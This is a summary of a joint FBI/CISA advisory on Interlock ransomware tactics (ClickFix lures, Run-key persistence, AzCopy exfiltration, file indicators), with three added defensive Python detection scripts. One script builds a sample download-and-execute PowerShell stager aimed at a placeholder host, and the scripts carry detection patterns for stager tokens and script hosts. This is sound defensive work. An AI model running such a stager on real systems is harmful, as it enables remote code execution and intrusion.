The Federal Bureau of Investigation (FBI), in collaboration with the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), has released a joint Cybersecurity Advisory on Interlock ransomware, which was first seen in 2024 and often targets Windows and Linux virtual machines.
The advisory outlines indicators of compromise and details the tactics, techniques, and procedures (TTPs) associated with Interlock ransomware, as uncovered in recent FBI investigations.
To reduce the risk of Interlock ransomware attacks, organizations are urged to take the following actions:
- Prevent initial access by using domain name system (DNS) filtering, deploying web access firewalls, and training employees to recognize social engineering tactics.
- Address known vulnerabilities by regularly updating and patching operating systems, applications, and firmware.
- Segment internal networks to limit lateral movement from infected devices to other parts of the organization.
- Strengthen identity and access management by enforcing organization-wide credential policies and enabling multifactor authentication wherever possible.
Download the complete Advisory HERE
Overview
Interlock ransomware first emerged in late September 2024, targeting a wide range of businesses and critical infrastructure across North America and Europe. According to the FBI, these attacks are opportunistic and financially motivated. Interlock ransomware operators have developed encryptors for both Windows and Linux environments and have primarily focused on encrypting virtual machines (VMs).
Notably, the group uses unconventional methods for initial access, such as drive-by downloads from compromised legitimate websites and a social engineering tactic called “ClickFix.” In the ClickFix approach, victims are tricked into running a malicious payload under the pretense of fixing a problem on their system.
Once inside a network, the actors carry out discovery, credential harvesting, and lateral movement to expand their access. They employ a double extortion model—encrypting systems after exfiltrating sensitive data to pressure victims into paying the ransom to both decrypt files and prevent public leaks.
Initial Access
The FBI has observed Interlock actors gaining initial access using:
- Drive-by downloads from compromised websites—a typical entry method for ransomware groups.
- Fake browser updates, previously posing as Google Chrome or Microsoft Edge, and more recently disguised as updates for well-known security tools.
- ClickFix social engineering, where users are presented with a malicious CAPTCHA prompt that instructs them to paste and execute a Base64-encoded PowerShell script.
This technique has also appeared in other malware campaigns like Lumma Stealer and DarkGate.
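Because the ClickFix lure ends with the victim pasting an encoded PowerShell command into the Run dialog, the resulting process-creation record is a good place to hunt. The script below is an added example written for this summary, not code from the advisory or from any of the agencies that published it: it pulls the Base64 blob out of a PowerShell command line, decodes it (PowerShell's encoded commands are UTF-16LE before Base64), and rates the finding higher when the decoded script contains download-and-run tokens or when the parent process is explorer.exe, which is what a Run-dialog launch looks like. The log line layout and all sample lines are constructed for the example; the encoded blobs are generated at runtime from benign text.

```python
import base64
import re
from typing import List, Optional

# Common spellings of the encoded-command switch followed by a Base64 blob.
ENCODED_ARG = re.compile(
    r"(?i)(?<![\w-])-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
# Tokens typical of download-and-run stagers; a hit raises the severity.
STAGER_TOKENS = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|webclient|invoke-webrequest|iwr|frombase64string)\b")
# Field layout of the constructed sample lines (hypothetical format, not a real product's).
LOG_FIELDS = re.compile(r"parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline=(?P<cmd>.*)$")


def encode_for_powershell(script: str) -> str:
    """Encode text the way -EncodedCommand expects (UTF-16LE, then Base64).
    Used here only to build the constructed sample lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse that encoding; None if the blob is not valid Base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_logs(lines: List[str]) -> List[dict]:
    """Return one finding per line that carries an encoded PowerShell command."""
    findings = []
    for line in lines:
        fields = LOG_FIELDS.search(line)
        if not fields:
            continue
        blob = ENCODED_ARG.search(fields["cmd"])
        if not blob:
            continue
        decoded = decode_encoded_command(blob.group(1))
        reasons = ["encoded PowerShell command line"]
        if decoded is None:
            reasons.append("blob does not decode as UTF-16LE Base64")
        else:
            hits = sorted({t.lower() for t in STAGER_TOKENS.findall(decoded)})
            if hits:
                reasons.append("stager tokens: " + ", ".join(hits))
        if fields["parent"].lower() == "explorer.exe":
            # A Win+R / Run-dialog launch, as in ClickFix, shows explorer.exe as parent.
            reasons.append("spawned by explorer.exe (Run dialog or shell)")
        findings.append({"line": line, "decoded": decoded, "reasons": reasons,
                         "severity": "high" if len(reasons) > 1 else "low"})
    return findings


# Constructed sample process-creation lines; the domain is a reserved .invalid name.
BENIGN_ENCODED = encode_for_powershell("Write-Host 'hello'")
STAGER_ENCODED = encode_for_powershell(
    "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/c')")
SAMPLE_LOGS = [
    "2025-07-01T10:00:00Z host=WS01 parent=cmd.exe image=powershell.exe "
    "cmdline=powershell -NoProfile -Command Get-Date",
    "2025-07-01T10:01:00Z host=WS01 parent=svchost.exe image=powershell.exe "
    f"cmdline=powershell -enc {BENIGN_ENCODED}",
    "2025-07-01T10:02:00Z host=WS02 parent=explorer.exe image=powershell.exe "
    f"cmdline=powershell -w hidden -ec {STAGER_ENCODED}",
]

if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding["severity"].upper(), "|", "; ".join(finding["reasons"]))
        print("  decoded:", finding["decoded"])
```

Only the third sample line is rated high: it is both launched from explorer.exe and decodes to a download-and-execute one-liner. Encoded commands on their own are common in legitimate automation, so the scoring treats them as low unless a second signal is present.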
Execution and Persistence
Once inside, Interlock actors deploy:
- A PowerShell-based Remote Access Trojan (RAT) that installs into the Windows Startup folder to maintain persistence.
- An alternative method using Windows Registry key modifications with a PowerShell script that adds a “Chrome Updater” run key.
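Both persistence methods above land in places an administrator can enumerate: the Run keys and the per-user Startup folder. The audit below is an added example for this summary, not code from the advisory: it takes autorun entries (modelled as name, source and command) and scores each one on signals that match the described tradecraft, such as a script host in the command, a binary under a user-writable path, a script dropped straight into the Startup folder, and a value name that borrows a vendor's product name while the path is outside that vendor's directory (the "Chrome Updater" pattern). The entries, paths and vendor-directory table are constructed for the example; in production the entries would come from a registry export or Sysinternals Autoruns output.

```python
import re
from typing import Dict, List, Tuple

# Script hosts and LOLBins that rarely belong in a legitimate autorun command.
SCRIPT_HOSTS = re.compile(
    r"(?i)\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b")
# Locations an unprivileged user can write to.
USER_WRITABLE = re.compile(r"(?i)\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\")
# Script files placed directly in the Startup folder.
SCRIPT_EXT = re.compile(r"(?i)\.(ps1|vbs|js|hta|bat|cmd)\b")
# If the value name claims a vendor, the binary should live under that vendor's directory
# (constructed table; extend for the products in your estate).
VENDOR_DIRS = {"chrome": "\\google\\", "google": "\\google\\", "edge": "\\microsoft\\"}


def score_entry(entry: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return a suspicion score and the reasons behind it for one autorun entry."""
    cmd, name = entry["command"], entry["name"]
    score, reasons = 0, []
    if SCRIPT_HOSTS.search(cmd):
        score += 3
        reasons.append("script host or LOLBin in autorun command")
    if USER_WRITABLE.search(cmd):
        score += 1
        reasons.append("binary under a user-writable path")
    for keyword, vendor_dir in VENDOR_DIRS.items():
        if keyword in name.lower() and vendor_dir not in cmd.lower():
            score += 3
            reasons.append(f"name suggests {keyword!r} but path is outside the vendor directory")
            break
    if entry["source"].lower() == "startup" and SCRIPT_EXT.search(cmd):
        score += 2
        reasons.append("script file placed in the Startup folder")
    return score, reasons


def audit_autoruns(entries: List[Dict[str, str]], threshold: int = 3) -> List[dict]:
    """Keep entries whose score reaches the threshold, in their original order."""
    flagged = []
    for entry in entries:
        score, reasons = score_entry(entry)
        if score >= threshold:
            flagged.append({"name": entry["name"], "source": entry["source"],
                            "score": score, "reasons": reasons})
    return flagged


# Constructed sample entries, as they might be read from the Run keys and Startup folder.
SAMPLE_ENTRIES = [
    {"source": "HKLM\\...\\Run", "name": "GoogleUpdate",
     "command": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe /c"},
    {"source": "HKCU\\...\\Run", "name": "Chrome Updater",
     "command": "powershell.exe -File C:\\Users\\alice\\AppData\\Roaming\\upd.ps1"},
    {"source": "Startup", "name": "update.ps1",
     "command": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.ps1"},
    {"source": "Startup", "name": "updater.lnk",
     "command": "wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\u.vbs"},
    {"source": "HKCU\\...\\Run", "name": "OneDrive",
     "command": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for hit in audit_autoruns(SAMPLE_ENTRIES):
        print(f"[{hit['score']}] {hit['source']} :: {hit['name']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The weighting is deliberately additive rather than a single rule: OneDrive legitimately runs from AppData and scores only one point, while the "Chrome Updater" value is caught three ways at once (script host, user-writable path, vendor mismatch). Tune the threshold against a known-clean baseline before using it for alerting.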
Command and Control (C2)
For maintaining control and executing commands, the actors use:
- Cobalt Strike
- SystemBC
- Interlock RAT
- NodeSnake RAT (observed as of March 2025)
Credential Access, Lateral Movement, and Privilege Escalation
After gaining remote access, Interlock actors:
- Deploy credential stealers and keyloggers to harvest user data and login credentials.
- Use third-party tools such as Lumma Stealer and Berserk Stealer for credential harvesting and privilege escalation.
- Move laterally using Remote Desktop Protocol (RDP), AnyDesk, and PuTTY.
- Target domain administrator accounts, potentially using Kerberoasting attacks.
Collection and Exfiltration
For data collection and exfiltration, actors utilize:
- Azure Storage Explorer to browse Microsoft Azure Storage.
- AzCopy to exfiltrate data to Azure blob storage.
- Additional file transfer tools like WinSCP for moving stolen data.
Impact
After exfiltrating data, the ransomware payload—usually a 64-bit executable named conhost.exe—is deployed to encrypt files.
Key details include:
- Use of AES and RSA encryption algorithms.
- Identification of a FreeBSD ELF encryptor, diverging from the more common Linux ESXi-targeting ransomware.
- On Linux, the payload uses a function called removeme to delete itself post-encryption.
- On Windows, a DLL (tmp41.wasd) is executed using rundll32.exe to remove the encryption binary.
Encrypted files receive a .interlock or .1nt3rlock extension, and a ransom note titled !__README__!.txt is deployed via Group Policy Object (GPO).
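The file-level indicators in this section (the two encrypted-file extensions, the ransom note name, and a payload that borrows the name of the Windows conhost.exe binary) are the quickest things to confirm during triage of a suspected host or file share. The sweep below is an added example for this summary, not code from the advisory: it walks a directory tree, collects files by those indicators, treats any conhost.exe outside the Windows\System32 directory as suspect, and summarizes counts per extension and the directories where notes were dropped. It builds its own constructed sample tree under a temporary directory so that it runs offline; point `sweep()` at a mounted volume or share to use it for real.

```python
import os
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List

# Indicators taken from the advisory summary above.
ENCRYPTED_EXTS = {".interlock", ".1nt3rlock"}
RANSOM_NOTE = "!__README__!.txt"
# The payload is described as a 64-bit executable named conhost.exe; the genuine
# binary lives only under Windows\System32, so any other location is suspect.
MASQUERADED_NAMES = {"conhost.exe"}
SYSTEM32 = os.path.join("windows", "system32").lower()


def sweep(root: Path) -> Dict[str, List[Path]]:
    """Walk the tree and bucket files by indicator type."""
    found: Dict[str, List[Path]] = {"encrypted": [], "notes": [], "suspect_binaries": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.suffix.lower() in ENCRYPTED_EXTS:
                found["encrypted"].append(path)
            elif name == RANSOM_NOTE:
                found["notes"].append(path)
            elif name.lower() in MASQUERADED_NAMES and SYSTEM32 not in str(path).lower():
                found["suspect_binaries"].append(path)
    return found


def summarize(found: Dict[str, List[Path]]) -> Dict[str, object]:
    """Condense the raw hits into the figures an incident report needs."""
    return {
        "by_extension": dict(Counter(p.suffix.lower() for p in found["encrypted"])),
        "note_dirs": sorted({str(p.parent) for p in found["notes"]}),
        "suspect_binaries": [str(p) for p in found["suspect_binaries"]],
    }


def build_sample_tree() -> Path:
    """Create a constructed sample tree in a temp directory (example data only)."""
    root = Path(tempfile.mkdtemp(prefix="interlock-triage-"))
    for rel in ["docs/report.docx.interlock", "docs/" + RANSOM_NOTE,
                "vm/disk.vmdk.1nt3rlock", "clean/notes.txt", "tools/conhost.exe"]:
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(b"constructed sample content")
    return root


if __name__ == "__main__":
    hits = sweep(build_sample_tree())
    print(summarize(hits))
```

On a real volume, `summarize()["note_dirs"]` gives a quick picture of how far the GPO-delivered note spread, and `by_extension` tells you which of the two extensions the encryptor in use produced, which helps when matching against other reporting.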
Ransom Note and Payment
The ransom note:
- Provides a unique victim ID.
- Directs victims to contact the attackers via a .onion site using the Tor browser.
- Does not contain an initial ransom amount or payment details—these are shared only after contact is made.
- Demands Bitcoin payments and threatens to leak stolen data if the ransom isn’t paid. The FBI has confirmed that Interlock actors have followed through on this threat.
Related Threats
There are open-source reports highlighting similarities between Interlock and Rhysida ransomware variants.